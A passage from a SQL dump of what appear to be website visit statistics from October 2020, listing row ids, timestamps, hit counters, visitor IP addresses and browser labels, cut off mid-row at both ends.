9','other'),(539914,1602410830,1,1,0,0,'173.252.95.111','other'),(539915,1602410833,1,1,0,0,'31.13.127.2','other'),(539916,1602410839,1,1,0,0,'69.171.251.116','other'),(539917,1602410851,1,1,0,0,'31.13.127.116','other'),(539918,1602410867,1,1,0,0,'173.252.95.15','other'),(539919,1602410886,1,1,0,0,'66.220.149.16','other'),(539920,1602410970,1,1,0,0,'66.220.149.35','other'),(539921,1602411142,1,1,0,0,'31.13.127.23','other'),(539922,1602411177,1,1,0,0,'91.196.178.25','chrome'),(539923,1602411215,1,1,0,0,'46.211.81.101','chrome'),(539924,1602411327,1,1,0,0,'31.13.127.3','other'),(539925,1602411478,1,1,0,0,'173.252.95.12','other'),(539926,1602411557,1,1,0,0,'91.196.178.2','chrome'),(539927,1602411573,1,1,0,0,'173.252.107.113','other'),(539928,1602411612,1,1,0,0,'31.13.127.17','other'),(539929,1602411613,1,1,0,0,'69.171.251.12','other'),(539930,1602412215,1,1,0,0,'69.171.251.117','other'),(539931,1602412217,1,1,0,0,'66.220.149.26','other'),(539932,1602412317,2,2,0,0,'173.252.95.9','other'),(539933,1602412353,1,1,0,0,'91.196.178.20','chrome'),(539934,1602412512,1,1,0,0,'91.196.178.25','chrome'),(539935,1602412579,1,1,0,0,'69.171.251.118','other'),(539936,1602412593,1,1,0,0,'66.220.149.9','other'),(539937,1602412598,1,1,0,0,'173.252.95.22','other'),(539938,1602412692,1,1,0,0,'31.13.127.120','other'),(539939,1602412744,1,1,0,0,'173.252.95.23','other'),(539940,1602412756,1,1,0,0,'173.252.95.13','other'),(539941,1602412785,1,1,0,0,'173.252.95.15','other'),(539942,1602412789,1,1,0,0,'31.13.127.19','other'),(539943,1602412846,1,1,0,0,'69.171.251.3','other'),(539944,1602412854,1,1,0,0,'173.252.127.23','other'),(539945,1602412877,1,1,0,0,'69.171.251.12','other'),(539946,1602412957,2,2,0,0,'173.252.95.17','other'),(539947,1602413426,1,1,0,0,'173.252.95.12','other'),(539948,1602413543,1,1,0,0,'173.252.127.20','other'),(539949,1602413620,1,1,0,0,'31.13.127.111','other'),(539950,1602413621,1,1,0,0,'31.13.127.118','other'),(539951,1602413695,1,1,0,0,'37.73.131.34','chrome'),(539952,1602413737,1,1,0,0,'31.13.127.9','other'),(539953,1602413809,1,1,0,0,'173.252.95.119','other'),(539954,1602414402,1,1,0,0,'69.171.251.112','other'),(539955,1602414409,1,1,0,0,'69.171.251.24','other'),(539956,1602414645,1,1,0,0,'173.252.95.112','other'),(539957,1602414713,1,1,0,0,'188.163.18.105','other'),(539958,1602415001,1,1,0,0,'173.252.95.19','other'),(539959,1602415013,1,1,0,0,'31.13.127.111','other'),(539960,1602415312,1,1,0,0,'31.13.127.119','other'),(539961,1602415313,2,2,0,0,'31.13.127.23','other'),(539962,1602415411,1,1,0,0,'173.252.95.3','other'),(539963,1602415590,1,1,0,0,'173.252.95.7','other'),(539964,1602415789,1,1,0,0,'31.13.127.10','other'),(539965,1602416038,1,1,0,0,'173.252.127.111','other'),(539966,1602416269,1,1,0,0,'94.153.31.62','chrome'),(539967,1602416363,1,1,0,0,'69.171.251.117','other'),(539968,1602416483,1,1,0,0,'69.171.251.14','other'),(539969,1602416496,1,1,0,0,'66.220.149.11','other'),(539970,1602416697,1,1,0,0,'46.211.41.70','chrome'),(539971,1602417395,1,1,0,0,'173.252.95.7','other'),(539972,1602417692,1,1,0,0,'173.252.95.24','other'),(539973,1602417756,1,1,0,0,'69.171.251.15','other'),(539974,1602417819,1,1,0,0,'94.153.69.9','chrome'),(539975,1602417853,1,1,0,0,'173.252.95.10','other'),(539976,1602417957,1,1,0,0,'173.252.127.118','other'),(539977,1602418022,1,1,0,0,'31.13.127.13','other'),(539978,1602418147,1,1,0,0,'94.153.21.70','chrome'),(539979,1602418685,1,1,0,0,'178.92.84.146','chrome'),(539980,1602418823,1,1,0,0,'91.196.178.25','chrome'),(539981,1602418847,1,1,0,0,'31.13.127.21','other'),(539982,1602418848,1,1,0,0,'31.13.127.6','other'),(539983,1602418988,1,1,0,0,'37.73.146.154','chrome'),(539984,1602419070,1,1,0,0,'94.153.69.232','chrome'),(539985,1602419177,1,1,0,0,'173.252.95.9','other'),(539986,1602419188,1,1,0,0,'69.171.251.23','other'),(539987,1602419218,1,1,0,0,'66.220.149.29','other'),(539988,1602420458,1,1,0,0,'173.252.95.16','other'),(539989,1602421381,1,1,0,0,'31.13.115.111','other'),(539990,1602421463,1,1,0,0,'31.13.115.2','other'),(539991,1602421464,1,1,0,0,'31.13.115.116','other'),(539992,1602421730,1,1,0,0,'69.171.251.4','other'),(539993,1602421790,1,1,0,0,'173.252.95.11','other'),(539994,1602421799,1,1,0,0,'66.220.149.27','other'),(539995,1602422313,1,1,0,0,'91.196.228.128','chrome'),(539996,1602422627,1,1,0,0,'31.13.127.16','other'),(539997,1602422628,1,1,0,0,'31.13.127.21','other'),(539998,1602423851,1,1,0,0,'173.252.127.27','other'),(539999,1602424438,1,1,0,0,'173.252.95.9','other'),(540000,1602424696,1,1,0,0,'173.252.95.11','other'),(540001,1602424748,1,1,0,0,'173.252.127.2','other'),(540002,1602424907,1,1,0,0,'69.171.251.8','other'),(540003,1602425031,1,1,0,0,'91.196.178.25','chrome'),(540004,1602425241,1,1,0,0,'31.13.127.11','other'),(540005,1602425312,1,1,0,0,'178.92.72.87','chrome'),(540006,1602425553,1,1,0,0,'66.220.149.112','other'),(540007,1602425814,1,1,0,0,'94.153.3.110','chrome'),(540008,1602425947,1,1,0,0,'31.13.103.116','other'),(540009,1602425949,1,1,0,0,'31.13.103.3','other'),(540010,1602426426,1,1,0,0,'31.13.127.1','other'),(540011,1602426429,1,1,0,0,'31.13.127.19','other'),(540012,1602426913,1,1,0,0,'69.171.251.15','other'),(540013,1602426968,1,1,0,0,'31.13.127.118','other'),(540014,1602427042,1,1,0,0,'104.168.118.215','chrome'),(540015,1602427198,1,1,0,0,'31.13.127.22','other'),(540017,1602427230,1,1,0,0,'91.196.178.112','chrome'),(540018,1602427255,1,1,0,0,'173.252.127.25','other'),(540019,1602427568,1,1,0,0,'173.252.95.120','other'),(540020,1602428172,1,1,0,0,'31.13.127.15','other'),(540021,1602428314,1,1,0,0,'173.252.95.27','other'),(540022,1602428541,1,1,0,0,'91.196.178.25','chrome'),(540023,1602429436,1,1,0,0,'91.196.178.46','chrome'),(540024,1602429453,1,1,0,0,'31.13.127.118','other'),(540026,1602429775,1,1,0,0,'31.13.127.113','other'),(540027,1602429776,1,1,0,0,'69.171.251.12','other'),(540028,1602430015,1,1,0,0,'69.171.251.6','other'),(540029,1602430083,1,1,0,0,'66.220.149.37','other'),(540030,1602430187,1,1,0,0,'66.220.149.4','other'),(540031,1602430826,1,1,0,0,'173.252.95.6','other'),(540032,1602430829,2,2,0,0,'31.13.127.116','other'),(540033,1602431139,1,1,0,0,'91.196.178.25','chrome'),(540034,1602431311,1,1,0,0,'31.13.127.13','other'),(540035,1602431788,2,2,0,0,'173.252.83.116','other'),(540036,1602431812,1,1,0,0,'66.220.149.13','other'),(540037,1602432162,1,1,0,0,'31.13.115.13','other'),(540038,1602432280,1,1,0,0,'91.196.178.35','chrome'),(540039,1602432330,1,1,0,0,'46.133.132.238','chrome'),(540040,1602433270,1,1,0,0,'173.252.95.120','other'),(540041,1602433279,1,1,0,0,'69.171.251.28','other'),(540042,1602433334,1,1,0,0,'66.220.149.119','other'),(540043,1602433440,1,1,0,0,'31.13.103.13','other'),(540044,1602433442,1,1,0,0,'31.13.103.20','other'),(540045,1602433541,1,1,0,0,'31.13.127.23','other'),(540046,1602433943,1,1,0,0,'66.220.149.1','other'),(540047,1602434439,1,1,0,0,'94.153.4.46','chrome'),(540048,1602435047,1,1,0,0,'31.13.127.17','other'),(540049,1602435048,1,1,0,0,'173.252.95.119','other'),(540050,1602435058,1,1,0,0,'31.13.127.6','other'),(540051,1602435509,1,1,0,0,'69.171.251.13','other'),(540052,1602435556,1,1,0,0,'91.196.178.26','chrome'),(540053,1602435784,1,1,0,0,'94.153.19.27','chrome'),(540054,1602436108,1,1,0,0,'46.133.121.151','chrome'),(540055,1602436145,1,1,0,0,'69.171.251.11','other'),(540056,1602436315,1,1,0,0,'31.13.127.3','other'),(540057,1602436718,1,1,0,0,'69.171.251.1','other'),(540058,1602436844,1,1,0,0,'95.135.236.51','other'),(540059,1602437008,1,1,0,0,'31.13.127.10','other'),(540060,1602437304,1,1,0,0,'185.208.229.33','chrome'),(540061,1602437780,1,1,0,0,'31.13.127.1','other'),(540062,1602438014,1,1,0,0,'194.44.220.198','chrome'),(540063,1602438251,1,1,0,0,'31.13.127.23','other'),(540064,1602438314,1,1,0,0,'31.13.127.8','other'),(540065,1602439297,1,1,0,0,'31.13.127.16','other'),(540066,1602439664,1,1,0,0,'173.252.95.10','other'),(540067,1602439748,1,1,0,0,'173.252.95.9','other'),(540068,1602439928,1,1,0,0,'94.153.6.153','chrome'),(540069,1602440065,1,1,0,0,'173.252.95.111','other'),(540070,1602440933,1,1,0,0,'46.133.44.203','chrome'),(540071,1602440966,1,1,0,0,'66.220.149.117','other'),(540072,1602440969,1,1,0,0,'66.220.149.32','other'),(540073,1602440992,1,1,0,0,'31.13.127.120','other'),(540074,1602441201,1,1,0,0,'173.252.95.9','other'),(540075,1602441717,1,1,0,0,'173.252.95.8','other'),(540076,1602442414,1,1,0,0,'66.220.149.113','other'),(540077,1602442795,1,1,0,0,'91.196.178.46','chrome'),(540078,1602442800,1,1,0,0,'31.13.103.117','other'),(540079,1602442802,1,1,0,0,'31.13.103.5','other'),(540080,1602443157,1,1,0,0,'91.196.178.25','chrome'),(540081,1602443590,2,2,0,0,'31.13.127.16','other'),(540082,1602443687,1,1,0,0,'188.239.27.43','chrome'),(540083,1602443780,1,1,0,0,'173.252.95.21','other'),(540084,1602444531,1,1,0,0,'69.171.251.15','other'),(540085,1602444752,1,1,0,0,'66.220.149.29','other'),(540086,1602444845,1,1,0,0,'31.13.127.20','other'),(540087,1602444914,1,1,0,0,'193.0.220.246','other'),(540088,1602444961,2,2,0,0,'31.13.103.1','other'),(540089,1602445390,1,1,0,0,'91.196.178.39','chrome'),(540090,1602445460,1,1,0,0,'31.13.127.11','other'),(540091,1602446250,1,1,0,0,'31.13.127.120','other'),(540092,1602446867,1,1,0,0,'31.13.127.11','other'),(540093,1602446939,1,1,0,0,'31.13.115.15','other'),(540094,1602447199,1,1,0,0,'91.196.178.187','chrome'),(540095,1602447697,1,1,0,0,'173.252.95.119','other'),(540096,1602448047,1,1,0,0,'31.13.103.16','other'),(540097,1602448048,1,1,0,0,'31.13.103.111','other'),(540098,1602448159,1,1,0,0,'173.252.111.111','other'),(540099,1602448485,1,1,0,0,'173.252.127.3','other'),(540100,1602448493,1,1,0,0,'173.252.95.28','other'),(540101,1602448832,1,1,0,0,'66.220.149.25','other'),(540102,1602448976,1,1,0,0,'69.171.251.117','other'),(540103,1602449033,1,1,0,0,'66.220.149.27','other'),(540104,1602450355,1,1,0,0,'31.13.127.21','other'),(540105,1602450387,1,1,0,0,'69.171.251.2','other'),(540106,1602450446,1,1,0,0,'173.252.95.26','other'),(540107,1602451184,1,1,0,0,'173.252.95.14','other'),(540108,1602451380,1,1,0,0,'185.237.217.15','chrome'),(540109,1602452010,1,1,0,0,'31.13.127.21','other'),(540110,1602452295,1,1,0,0,'31.13.103.16','other'),(540111,1602452296,1,1,0,0,'31.13.103.2','other'),(540112,1602453652,1,1,0,0,'194.36.87.13','firefox'),(540113,1602454206,1,0,1,0,'66.249.66.91',''),(540114,1602455613,1,1,0,0,'31.13.127.7','other'),(540115,1602455857,1,1,0,0,'31.13.103.111','other'),(540116,1602455858,1,1,0,0,'31.13.103.9','other'),(540117,1602469617,1,1,0,0,'31.13.103.4','other'),(540118,1602469618,1,1,0,0,'31.13.103.19','other'),(540119,1602470075,1,1,0,0,'31.13.103.15','other'),(540120,1602470076,1,1,0,0,'31.13.103.117','other'),(540121,1602470522,1,1,0,0,'173.252.95.1','other'),(540122,1602472413,1,1,0,0,'69.171.251.7','other'),(540123,1602472790,1,1,0,0,'178.136.120.107','chrome'),(540124,1602473071,1,1,0,0,'31.13.103.3','other'),(540125,1602473072,1,1,0,0,'31.13.103.116','other'),(540126,1602474075,1,1,0,0,'91.196.178.25','chrome'),(540127,1602474809,1,1,0,0,'31.13.103.113','other'),(540128,1602474810,1,1,0,0,'31.13.103.24','other'),(540129,1602475102,1,1,0,0,'92.113.174.235','chrome'),(540130,1602475118,1,1,0,0,'173.252.127.16','other'),(540131,1602475570,1,1,0,0,'31.13.103.1','other'),(540132,1602476139,1,1,0,0,'173.252.95.118','other'),(540133,1602476177,1,1,0,0,'31.13.127.117','other'),(540134,1602478692,1,1,0,0,'69.171.251.116','other'),(540135,1602478705,1,1,0,0,'31.13.127.6','other'),(540136,1602479045,1,1,0,0,'178.92.249.185','chrome'),(540137,1602480567,1,1,0,0,'31.13.127.4','other'),(540138,1602480758,1,1,0,0,'31.13.127.19','other'),(540139,1602485443,1,1,0,0,'31.13.127.1','other'),(540140,1602489100,1,1,0,0,'173.252.87.3','other'),(540141,1602489609,1,1,0,0,'188.163.74.214','chrome'),(540142,1602491096,1,1,0,0,'185.117.241.164','chrome'),(540143,1602491236,1,1,0,0,'173.252.127.13','other'),(540144,1602491397,1,1,0,0,'69.171.251.17','other'),(540145,1602492311,1,1,0,0,'173.252.95.120','other'),(540146,1602493613,1,1,0,0,'193.19.254.118','chrome'),(540147,1602494943,2,2,0,0,'31.13.127.3','other'),(540148,1602495078,1,1,0,0,'69.171.251.23','other'),(540149,1602495604,1,1,0,0,'31.13.127.10','other'),(540150,1602499305,1,1,0,0,'69.171.251.23','other'),(540151,1602499717,1,1,0,0,'212.113.43.119','chrome'),(540152,1602500143,1,1,0,0,'31.13.127.116','other'),(540153,1602502074,1,1,0,0,'31.13.127.10','other'),(540154,1602503614,1,1,0,0,'178.133.9.66','chrome'),(540155,1602505413,1,1,0,0,'66.220.149.117','other'),(540156,1602505752,1,1,0,0,'31.13.127.11','other'),(540157,1602507657,1,1,0,0,'31.13.127.13','other'),(540158,1602507995,1,1,0,0,'69.171.251.2','other'),(540159,1602508003,1,1,0,0,'66.220.149.117','other'),(540160,1602508617,1,1,0,0,'91.196.178.189','chrome'),(540161,1602509602,1,1,0,0,'91.196.178.189','chrome'),(540162,1602510210,1,1,0,0,'173.252.127.31','other'),(540163,1602511436,2,2,0,0,'91.196.178.25','chrome'),(540164,1602511850,1,1,0,0,'31.13.127.2','other'),(540165,1602511851,2,2,0,0,'31.13.127.22','other'),(540167,1602511858,1,1,0,0,'31.13.127.17','other'),(540168,1602511859,2,2,0,0,'31.13.127.4','other'),(540169,1602511884,1,1,0,0,'37.55.58.59','chrome'),(540170,1602511956,1,1,0,0,'173.252.95.29','other'),(540171,1602511957,1,1,0,0,'173.252.95.19','other'),(540172,1602511998,1,1,0,0,'95.135.213.180','chrome'),(540173,1602511999,1,1,0,0,'91.196.178.70','chrome'),(540174,1602512010,1,1,0,0,'91.196.178.109','chrome'),(540175,1602512209,1,1,0,0,'185.237.217.22','chrome'),(540176,1602512253,1,1,0,0,'94.153.69.246','chrome'),(540177,1602512254,1,1,0,0,'173.252.127.21','other'),(540178,1602512340,1,1,0,0,'91.196.178.25','chrome'),(540179,1602512442,1,1,0,0,'91.196.178.46','chrome'),(540180,1602512444,1,1,0,0,'31.13.115.26','other'),(540181,1602512445,1,1,0,0,'31.13.115.12','other'),(540182,1602512839,1,1,0,0,'91.196.178.165','chrome'),(540183,1602513540,2,2,0,0,'31.13.127.15','other'),(540184,1602513693,1,1,0,0,'91.196.178.50','chrome'),(540185,1602513982,1,1,0,0,'91.196.178.179','chrome'),(540186,1602514114,2,2,0,0,'31.13.127.111','other'),(540187,1602514115,1,1,0,0,'31.13.127.12','other'),(540190,1602514116,1,1,0,0,'31.13.127.4','other'),(540192,1602514119,1,1,0,0,'31.13.127.118','other'),(540193,1602514628,1,1,0,0,'91.196.178.38','chrome'),(540194,1602514976,1,1,0,0,'91.196.178.152','chrome'),(540195,1602515019,1,1,0,0,'91.196.178.120','chrome'),(540196,1602515113,1,1,0,0,'94.153.1.186','chrome'),(540197,1602515278,1,1,0,0,'91.196.178.59','other'),(540198,1602515464,1,1,0,0,'193.201.217.240','chrome'),(540199,1602515623,1,1,0,0,'46.211.8.246','other'),(540200,1602516046,1,1,0,0,'91.196.178.59','chrome'),(540201,1602516309,1,1,0,0,'91.196.178.25','chrome'),(540202,1602516431,1,1,0,0,'31.13.127.3','other'),(540203,1602516432,1,1,0,0,'31.13.127.117','other'),(540204,1602516514,1,1,0,0,'46.201.175.240','chrome'),(540205,1602516709,1,1,0,0,'31.13.127.11','other'),(540206,1602516746,1,1,0,0,'31.13.127.24','other'),(540207,1602516747,1,1,0,0,'31.13.127.118','other'),(540208,1602516818,1,1,0,0,'178.133.181.123','chrome'),(540209,1602516997,1,1,0,0,'91.196.177.26','chrome'),(540210,1602517008,1,1,0,0,'185.237.217.6','chrome'),(540211,1602517312,1,1,0,0,'91.196.178.25','chrome'),(540212,1602517518,1,1,0,0,'91.196.178.184','chrome'),(540213,1602517970,1,1,0,0,'31.13.127.119','other'),(540214,1602517971,2,2,0,0,'31.13.127.2','other'),(540215,1602518176,1,1,0,0,'91.196.178.22','chrome'),(540216,1602518251,1,1,0,0,'31.13.127.18','other'),(540217,1602518572,1,1,0,0,'188.191.101.96','other'),(540218,1602518635,1,1,0,0,'88.155.80.141','chrome'),(540219,1602518823,1,1,0,0,'91.196.178.114','chrome'),(540220,1602518901,1,1,0,0,'31.13.127.13','other'),(540221,1602519318,2,2,0,0,'31.13.127.24','other'),(540222,1602519598,1,1,0,0,'91.196.178.25','chrome'),(540223,1602519731,1,1,0,0,'88.155.97.205','chrome'),(540224,1602520143,1,1,0,0,'185.237.217.14','chrome'),(540225,1602520339,1,1,0,0,'37.55.59.88','chrome'),(540226,1602520341,1,1,0,0,'173.252.127.25','other'),(540227,1602520381,1,1,0,0,'91.196.178.164','chrome'),(540228,1602520450,1,1,0,0,'31.13.127.117','other'),(540229,1602520451,1,1,0,0,'31.13.127.19','other'),(540230,1602520462,1,1,0,0,'66.220.149.1','other'),(540231,1602520695,1,1,0,0,'92.113.127.239','chrome'),(540232,1602521068,1,1,0,0,'173.252.95.8','other'),(540233,1602521103,1,1,0,0,'91.196.178.88','chrome'),(540234,1602521125,1,1,0,0,'91.196.178.82','chrome'),(540235,1602521331,1,1,0,0,'91.196.178.107','chrome'),(540236,1602521563,1,1,0,0,'69.171.251.23','other'),(540237,1602521923,1,1,0,0,'91.196.178.25','chrome'),(540238,1602521970,1,1,0,0,'31.13.127.4','other'),(540240,1602522306,1,1,0,0,'91.196.178.145','chrome'),(540241,1602522377,1,1,0,0,'173.252.95.17','other'),(540242,1602522596,1,1,0,0,'91.196.178.169','chrome'),(540243,1602522677,1,1,0,0,'173.252.87.119','other'),(540244,1602522678,1,1,0,0,'31.13.127.6','other'),(540245,1602523055,1,1,0,0,'31.13.127.12','other'),(540246,1602523406,1,1,0,0,'91.196.178.50','chrome'),(540247,1602523708,1,1,0,0,'91.196.178.25','chrome'),(540248,1602523885,1,1,0,0,'31.13.127.23','other'),(540250,1602523893,1,1,0,0,'31.13.127.10','other'),(540251,1602524162,1,1,0,0,'91.196.178.26','chrome'),(540252,1602524403,1,1,0,0,'173.252.127.9','other'),(540253,1602524404,1,1,0,0,'173.252.127.113','other'),(540254,1602525231,1,1,0,0,'91.196.178.145','chrome'),(540255,1602525267,1,1,0,0,'173.252.79.118','other'),(540256,1602525272,1,1,0,0,'173.252.79.13','other'),(540257,1602526243,1,1,0,0,'31.13.127.20','other'),(540258,1602526633,1,1,0,0,'212.113.42.253','chrome'),(540259,1602526813,1,1,0,0,'31.13.115.20','other'),(540260,1602526814,1,1,0,0,'31.13.115.18','other'),(540261,1602527418,1,1,0,0,'173.252.79.6','other'),(540262,1602527544,1,1,0,0,'178.92.95.25','chrome'),(540263,1602527589,1,1,0,0,'173.252.95.17','other'),(540264,1602527714,1,1,0,0,'173.252.79.112','other'),(540265,1602527715,1,1,0,0,'173.252.79.15','other'),(540266,1602527737,1,1,0,0,'176.36.129.251','chrome'),(540267,1602527912,1,1,0,0,'173.252.111.1','other'),(540268,1602528559,1,1,0,0,'91.196.178.25','chrome'),(540269,1602528845,1,1,0,0,'173.252.95.25','other'),(540270,1602529132,2,2,0,0,'31.13.103.117','other'),(540271,1602529293,1,1,0,0,'195.10.210.49','chrome'),(540272,1602529313,1,1,0,0,'31.13.127.5','other'),(540273,1602529666,1,1,0,0,'91.196.178.13','chrome'),(540274,1602529873,1,1,0,0,'91.196.178.165','chrome'),(540275,1602530324,1,1,0,0,'31.13.127.111','other'),(540276,1602531144,1,1,0,0,'178.95.157.212','chrome'),(540277,1602531411,1,1,0,0,'91.196.178.187','chrome'),(540278,1602531555,1,1,0,0,'69.171.251.5','other'),(540279,1602531610,1,1,0,0,'31.13.127.21','other'),(540280,1602531815,1,1,0,0,'91.196.178.25','chrome'),(540281,1602531898,1,1,0,0,'94.153.15.102','chrome'),(540282,1602533276,1,1,0,0,'173.252.95.3','other'),(540283,1602534095,1,1,0,0,'31.13.127.6','other'),(540284,1602534609,1,1,0,0,'91.196.178.177','chrome'),(540285,1602535969,1,1,0,0,'173.252.95.23','other'),(540286,1602536081,1,1,0,0,'31.13.127.18','other'),(540287,1602536265,1,1,0,0,'91.196.178.25','chrome'),(540288,1602537791,1,1,0,0,'128.124.81.132','chrome'),(540289,1602538955,1,1,0,0,'31.13.127.23','other'),(540290,1602540716,2,0,2,0,'66.249.66.91',''),(540291,1602543407,1,1,0,0,'31.13.103.23','other'),(540293,1602546664,1,1,0,0,'185.237.217.23','other'),(540294,1602549836,1,1,0,0,'3.248.185.10','chrome'),(540295,1602551983,1,1,0,0,'46.211.14.234','chrome'),(540296,1602555663,1,1,0,0,'31.13.103.18','other'),(540297,1602556527,1,1,0,0,'66.220.149.21','other'),(540298,1602556980,1,1,0,0,'31.13.103.24','other'),(540299,1602556981,1,1,0,0,'31.13.103.14','other'),(540300,1602557983,1,1,0,0,'31.13.103.12','other'),(540301,1602560816,1,1,0,0,'91.196.178.102','chrome'),(540302,1602561418,1,1,0,0,'91.196.178.25','chrome'),(540303,1602562706,1,1,0,0,'128.124.20.220','chrome'),(540304,1602563872,1,1,0,0,'31.13.127.3','other'),(540305,1602564028,1,1,0,0,'46.211.53.194','chrome'),(540306,1602564226,1,1,0,0,'173.252.95.3','other'),(540307,1602564479,1,1,0,0,'66.220.149.120','other'),(540308,1602565974,1,1,0,0,'31.13.127.13','other'),(540309,1602568058,2,2,0,0,'91.196.178.166','firefox'),(540310,1602568469,1,1,0,0,'31.13.127.1','other'),(540311,1602570398,1,1,0,0,'185.237.217.12','chrome'),(540312,1602570447,1,1,0,0,'31.13.127.1','other'),(540313,1602570801,1,1,0,0,'46.133.213.61','chrome'),(540314,1602573639,1,1,0,0,'66.220.149.116','other'),(540315,1602573643,1,1,0,0,'66.220.149.9','other'),(540316,1602573712,1,1,0,0,'91.196.178.156','chrome'),(540317,1602574257,1,1,0,0,'31.13.115.16','other'),(540318,1602574258,1,1,0,0,'31.13.115.14','other'),(540319,1602574411,1,1,0,0,'5.255.253.92','other'),(540320,1602574720,1,1,0,0,'173.252.95.20','other'),(540321,1602575644,1,1,0,0,'46.211.3.16','chrome'),(540322,1602575671,1,1,0,0,'91.196.178.25','chrome'),(540323,1602575755,2,2,0,0,'31.13.127.117','other'),(540324,1602575883,1,1,0,0,'31.13.127.4','other'),(540325,1602575884,1,1,0,0,'31.13.127.3','other'),(540326,1602575895,1,1,0,0,'31.13.127.21','other'),(540327,1602575896,1,1,0,0,'31.13.127.14','other'),(540328,1602575898,1,1,0,0,'31.13.127.7','other'),(540329,1602575899,1,1,0,0,'31.13.127.10','other'),(540330,1602575900,1,1,0,0,'31.13.127.15','other'),(540331,1602576178,1,1,0,0,'173.252.95.2','other'),(540332,1602577041,1,1,0,0,'91.196.178.25','chrome'),(540333,1602577438,1,1,0,0,'31.13.127.1','other'),(540334,1602577439,1,1,0,0,'31.13.127.22','other'),(540335,1602577548,1,1,0,0,'185.237.217.15','chrome'),(540336,1602577908,1,1,0,0,'31.13.127.8','other'),(540337,1602579712,1,1,0,0,'173.252.111.118','other'),(540338,1602579741,1,1,0,0,'31.13.127.13','other'),(540340,1602580871,1,1,0,0,'31.13.127.6','other'),(540341,1602581226,1,1,0,0,'91.196.178.93','chrome'),(540342,1602581906,1,1,0,0,'31.129.235.215','chrome'),(540343,1602582172,1,1,0,0,'91.196.178.30','chrome'),(540344,1602582416,1,1,0,0,'31.13.127.111','other'),(540345,1602582417,1,1,0,0,'31.13.127.16','other'),(540346,1602582678,1,1,0,0,'66.220.149.34','other'),(540347,1602582887,1,1,0,0,'91.196.178.25','chrome'),(540348,1602583874,1,1,0,0,'46.219.204.156','chrome'),(540349,1602583953,1,1,0,0,'31.13.127.15','other'),(540350,1602584088,1,1,0,0,'173.252.95.7','other'),(540351,1602584367,1,1,0,0,'146.158.58.175','chrome'),(540352,1602585758,1,1,0,0,'31.13.127.8','other'),(540353,1602585759,1,1,0,0,'31.13.127.1','other'),(540354,1602586925,1,1,0,0,'31.13.127.7','other'),(540355,1602587129,1,1,0,0,'173.252.95.15','other'),(540356,1602587505,1,1,0,0,'91.196.178.25','chrome'),(540357,1602587805,1,1,0,0,'46.133.16.212','chrome'),(540358,1602588413,1,1,0,0,'185.237.217.28','chrome'),(540359,1602589163,1,1,0,0,'37.73.146.35','chrome'),(540360,1602589527,1,1,0,0,'31.13.127.12','other'),(540361,1602590434,1,1,0,0,'91.196.178.25','chrome'),(540362,1602591690,1,1,0,0,'173.252.95.19','other'),(540363,1602591865,1,1,0,0,'66.220.149.5','other'),(540364,1602592596,1,1,0,0,'31.13.127.21','other'),(540366,1602592855,1,1,0,0,'173.252.95.22','other'),(540367,1602592862,1,1,0,0,'66.220.149.119','other'),(540368,1602592907,1,1,0,0,'31.13.127.17','other'),(540369,1602593085,1,1,0,0,'91.196.178.30','chrome'),(540370,1602593248,1,1,0,0,'31.13.127.19','other'),(540371,1602593249,1,1,0,0,'31.13.127.5','other'),(540372,1602593264,1,1,0,0,'31.13.127.120','other'),(540373,1602593336,1,1,0,0,'173.252.95.117','other'),(540374,1602595779,1,1,0,0,'173.252.83.116','other'),(540375,1602597953,1,1,0,0,'31.13.127.12','other'),(540376,1602599760,3,3,0,0,'46.211.41.196','chrome'),(540377,1602600234,2,2,0,0,'31.13.127.6','other'),(540378,1602600235,1,1,0,0,'31.13.127.21','other'),(540379,1602600236,2,2,0,0,'31.13.127.3','other'),(540380,1602600297,1,1,0,0,'31.13.127.17','other'),(540383,1602600298,2,2,0,0,'31.13.127.117','other'),(540386,1602601007,1,1,0,0,'91.196.178.25','chrome'),(540387,1602601378,2,2,0,0,'31.13.127.3','other'),(540388,1602601379,1,1,0,0,'31.13.127.26','other'),(540390,1602601795,1,1,0,0,'31.13.127.4','other'),(540391,1602601892,1,1,0,0,'31.13.103.24','other'),(540392,1602601893,1,1,0,0,'31.13.103.118','other'),(540393,1602603061,1,1,0,0,'91.241.113.90','chrome'),(540394,1602603996,1,1,0,0,'91.196.178.38','chrome'),(540395,1602605183,1,1,0,0,'31.182.239.161','chrome'),(540396,1602605866,1,1,0,0,'66.220.149.32','other'),(540397,1602605892,1,1,0,0,'31.13.127.117','other'),(540398,1602606866,1,1,0,0,'173.252.127.4','other'),(540399,1602607320,1,1,0,0,'173.252.95.28','other'),(540400,1602607421,2,2,0,0,'31.13.127.8','other'),(540401,1602608461,1,1,0,0,'185.151.86.125','chrome'),(540402,1602608731,1,1,0,0,'37.73.170.73','chrome'),(540403,1602609476,1,1,0,0,'66.102.9.116','chrome'),(540404,1602609479,1,1,0,0,'74.125.210.42','chrome'),(540405,1602609576,1,1,0,0,'66.220.149.118','other'),(540406,1602610303,2,2,0,0,'128.124.172.249','chrome'),(540407,1602610508,1,1,0,0,'91.196.178.25','chrome'),(540408,1602611019,1,1,0,0,'91.196.178.11','chrome'),(540409,1602611201,1,1,0,0,'46.211.71.79','chrome'),(540410,1602611701,1,1,0,0,'91.196.178.25','chrome'),(540411,1602611880,1,1,0,0,'31.13.127.2','other'),(540412,1602612531,1,1,0,0,'69.171.251.15','other'),(540413,1602612655,2,2,0,0,'94.153.12.216','chrome'),(540414,1602613617,1,1,0,0,'173.252.95.24','other'),(540415,1602613837,1,1,0,0,'185.237.217.7','firefox'),(540416,1602613895,1,1,0,0,'173.252.95.13','other'),(540417,1602613992,1,1,0,0,'31.13.127.1','other'),(540418,1602614225,1,1,0,0,'173.252.95.30','other'),(540419,1602614414,1,1,0,0,'173.252.95.6','other'),(540420,1602614480,1,1,0,0,'31.13.115.17','other'),(540421,1602614540,1,1,0,0,'46.211.30.127','other'),(540422,1602614556,1,1,0,0,'173.252.83.117','other'),(540423,1602614558,1,1,0,0,'173.252.83.8','other'),(540424,1602615050,1,1,0,0,'176.118.53.144','chrome'),(540425,1602615301,2,2,0,0,'31.13.127.9','other'),(540426,1602616683,1,1,0,0,'173.252.87.32','other'),(540427,1602616686,1,1,0,0,'173.252.87.19','other'),(540428,1602617079,1,1,0,0,'31.13.115.6','other'),(540429,1602617080,1,1,0,0,'31.13.115.4','other'),(540430,1602617088,1,1,0,0,'173.252.111.120','other'),(540431,1602617125,2,2,0,0,'173.252.111.112','other'),(540432,1602617476,1,1,0,0,'173.252.111.111','other'),(540433,1602617876,1,1,0,0,'37.73.178.228','chrome'),(540434,1602619944,1,1,0,0,'173.252.83.1','other'),(540435,1602619945,1,1,0,0,'173.252.95.116','other'),(540438,1602620597,1,1,0,0,